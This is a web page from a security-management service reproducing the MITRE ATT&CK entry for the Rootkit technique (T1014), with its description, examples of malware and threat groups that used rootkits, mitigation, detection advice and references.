Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Техника Руткит
Каталоги
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
EN
Риски
Каталоги
MITRE ATT&CK
Техника
Руткит
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Руткит

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

ID: T1014
Тактика(-и): Defense Evasion
Платформы: Linux, macOS, Windows
Источники данных: Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Версия: 1.1
Дата создания: 31 May 2017
Последнее изменение: 05 May 2022

Примеры процедур
Название Описание
Ebury

Ebury has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)
Winnti Group

Winnti Group used a rootkit to modify typical server functionality.(Citation: Kaspersky Winnti April 2013)
APT41

APT41 deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
Rocke

Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)
Carberp

Carberp has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)
Ramsay

Ramsay has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)

Drovorub

Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)
HTRAN

HTRAN can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)
HIDEDRV

HIDEDRV is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)
TeamTNT

TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.(Citation: Trend Micro TeamTNT) (Citation: Cisco Talos Intelligence Group)
Skidmap

Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)
Umbreon

Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)
Stuxnet

Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.(Citation: Symantec W.32 Stuxnet Dossier)
Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)
HiddenWasp

HiddenWasp uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)
Hildegard

Hildegard has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)
APT28

APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.(Citation: Symantec APT28 Oct 2018)(Citation: ESET LoJax Sept 2018)
Hikit

Hikit is a Rootkit that has been used by Axiom.(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2)

Winnti for Linux

Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)
Zeroaccess

Zeroaccess is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)
LoJax

LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)
Uroburos

Uroburos is a rootkit used by Turla.(Citation: Kaspersky Turla)
WarzoneRAT

WarzoneRAT can include a rootkit to hide processes, files, and startup.(Citation: Check Point Warzone Feb 2020)
Caterpillar WebShell

Caterpillar WebShell has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021)

PoisonIvy

PoisonIvy starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)

Контрмеры
Контрмера Описание
Rootkit Mitigation

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Обнаружение

Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)

Ссылки

  1. Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
  2. Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.
  3. Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.
  4. Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.
  5. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  6. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
  7. Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
  8. Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.
  9. Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
  10. ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.
  11. Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.
  12. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
  13. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  14. ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.
  15. Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
  16. Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.
  17. Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
  18. Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.
  19. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  20. Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.
  21. Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.
  22. Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.
  23. Sanmillan, I.. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.
  24. Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
  25. Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
  26. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
  27. Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.
  28. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  29. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
  30. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  31. Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.
  32. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
Навигация

Каталоги

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.